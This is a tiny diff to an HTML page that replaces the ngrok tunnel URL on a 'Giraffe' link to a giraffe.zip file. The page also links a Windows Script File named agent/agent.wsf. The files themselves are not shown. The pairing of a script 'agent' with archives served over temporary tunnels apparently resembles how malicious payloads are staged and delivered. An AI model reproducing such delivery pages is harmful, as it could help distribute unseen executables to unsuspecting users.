--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://f53b-2a00-1370-817a-a600-3c62-d7ce-c8fb-481f.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://7fd3-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
